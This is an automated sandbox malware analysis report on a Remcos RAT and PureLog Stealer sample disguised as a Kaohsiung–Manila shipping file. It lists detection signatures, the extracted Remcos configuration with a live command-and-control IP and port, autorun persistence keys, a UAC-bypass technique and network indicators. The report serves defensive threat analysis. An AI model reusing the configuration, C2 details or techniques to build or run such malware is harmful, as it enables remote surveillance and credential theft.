Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe

Overview

General Information

Sample name:#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe
renamed because original name is a hash value
Original sample name: 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe
Analysis ID:1564895
MD5:2108fe4bc36c181c43d01825b56d8349
SHA1:274e3b1be233129a95658fe508706c0ebc4114a5
SHA256:f36c39084b68e1c96f6d960a9def941304a3b2f93907d6650587125627baa89f
Tags:exeuser-threatcat_ch
Infos:

Detection

PureLog Stealer, Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected PureLog Stealer
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Creates autostart registry keys with suspicious names
Delayed program exit found
Drops executable to a common third party application directory
Machine Learning detection for dropped file
Machine Learning detection for sample
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Adobe.exe (PID: 6604 cmdline: "C:\ProgramData\Adobe\Adobe.exe" MD5: 2108FE4BC36C181C43D01825B56D8349)
    • Adobe.exe (PID: 1812 cmdline: "C:\ProgramData\Adobe\Adobe.exe" MD5: 2108FE4BC36C181C43D01825B56D8349)
  • Adobe.exe (PID: 1352 cmdline: "C:\ProgramData\Adobe\Adobe.exe" MD5: 2108FE4BC36C181C43D01825B56D8349)
    • Adobe.exe (PID: 5296 cmdline: "C:\ProgramData\Adobe\Adobe.exe" MD5: 2108FE4BC36C181C43D01825B56D8349)
  • Adobe.exe (PID: 6608 cmdline: "C:\ProgramData\Adobe\Adobe.exe" MD5: 2108FE4BC36C181C43D01825B56D8349)
    • Adobe.exe (PID: 5228 cmdline: "C:\ProgramData\Adobe\Adobe.exe" MD5: 2108FE4BC36C181C43D01825B56D8349)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["104.250.180.178:7902:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "Adobe.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Adobe_Nov-3XE9WN", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Adobe", "Keylog folder": "remcos"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.2247441432.0000000000F47000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000000.00000002.2047465840.00000000048BE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
      00000000.00000002.2047465840.00000000048BE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000000.00000002.2047465840.00000000048BE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          00000000.00000002.2047465840.00000000048BE000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
          • 0x6af80:$a1: Remcos restarted by watchdog!
          • 0x6b4f8:$a3: %02i:%02i:%02i:%03i
          Click to see the 35 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.70f0000.4.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.70f0000.4.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              3.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.400000.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                3.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                  3.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    Click to see the 33 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\Adobe\Adobe.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe, ProcessId: 7152, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Adobe_Nov-3XE9WN
                    Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\Adobe\Adobe.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe, ProcessId: 7152, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Adobe_Nov-3XE9WN

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-29T00:01:03.649524+010020365941Malware Command and Control Activity Detected192.168.2.549707104.250.180.1787902TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-29T00:01:07.285991+010028033043Unknown Traffic192.168.2.549709178.237.33.5080TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 00000000.00000002.2047465840.00000000048BE000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["104.250.180.178:7902:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "Adobe.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Adobe_Nov-3XE9WN", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Adobe", "Keylog folder": "remcos"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\ProgramData\Adobe\Adobe.exeReversingLabs: Detection: 65%
                    Multi AV Scanner detection for submitted file
                    Source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeReversingLabs: Detection: 65%
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 3.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.48be488.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.48be488.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.3e7b708.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.3e7b708.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.2247441432.0000000000F47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2047465840.00000000048BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2047950519.0000000001267000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2047465840.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.2327232741.0000000001727000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2170021457.0000000001567000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.4507004110.0000000000E37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2047465840.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe PID: 3668, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe PID: 7152, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Adobe.exe PID: 1532, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Adobe.exe PID: 1812, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Adobe.exe PID: 5296, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Adobe.exe PID: 5228, type: MEMORYSTR
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\ProgramData\Adobe\Adobe.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,3_2_0043293A
                    Source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe, 00000000.00000002.2047465840.00000000048BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_44d5e8bd-f

                    Exploits

                    barindex
                    Yara detected UAC Bypass using CMSTP
                    Source: Yara matchFile source: 3.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.48be488.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.48be488.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.3e7b708.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.3e7b708.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2047465840.00000000048BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2047465840.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2047465840.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe PID: 3668, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe PID: 7152, type: MEMORYSTR

                    Privilege Escalation

                    barindex
                    Contains functionality to bypass UAC (CMSTPLUA)
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00406764 _wcslen,CoGetObject,3_2_00406764
                    Source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: uoct.pdbSHA2567B source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe, Adobe.exe.3.dr
                    Source: Binary string: uoct.pdb source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe, Adobe.exe.3.dr
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,3_2_0040B335
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,3_2_0041B42F
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,3_2_0040B53A
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_0044D5E9 FindFirstFileExA,3_2_0044D5E9
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,3_2_004089A9
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00406AC2 FindFirstFileW,FindNextFileW,3_2_00406AC2
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,3_2_00407A8C
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,3_2_00418C69
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,3_2_00408DA7
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,3_2_00406F06

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49707 -> 104.250.180.178:7902
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorIPs: 104.250.180.178
                    Source: global trafficTCP traffic: 192.168.2.5:49707 -> 104.250.180.178:7902
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: Joe Sandbox ViewIP Address: 104.250.180.178 104.250.180.178
                    Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                    Source: Joe Sandbox ViewASN Name: M247GB M247GB
                    Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49709 -> 178.237.33.50:80
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.250.180.178
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_004260F7 recv,3_2_004260F7
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                    Source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe, Adobe.exe, 00000007.00000002.4507004110.0000000000E6F000.00000004.00000020.00020000.00000000.sdmp, Adobe.exe, 00000007.00000002.4507004110.0000000000E37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                    Source: Adobe.exe, 00000007.00000002.4507004110.0000000000E6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp$
                    Source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe, 00000000.00000002.2047465840.00000000048BE000.00000004.00000800.00020000.00000000.sdmp, #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe, 00000000.00000002.2047465840.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe, 00000000.00000002.2047465840.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe, 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                    Source: Adobe.exe, 00000007.00000002.4507004110.0000000000E37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpSystem32
                    Source: Adobe.exe, 00000007.00000002.4507004110.0000000000E6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to register a low level keyboard hook
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_004099E4 SetWindowsHookExA 0000000D,004099D0,000000003_2_004099E4
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_004159C6
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_004159C6
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_004159C6
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,3_2_00409B10
                    Source: Yara matchFile source: 3.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.48be488.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.48be488.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.3e7b708.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.3e7b708.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2047465840.00000000048BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2047465840.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2047465840.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe PID: 3668, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe PID: 7152, type: MEMORYSTR

                    E-Banking Fraud

                    barindex
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 3.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.48be488.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.48be488.3.unpack, type: UNPACKEDPE
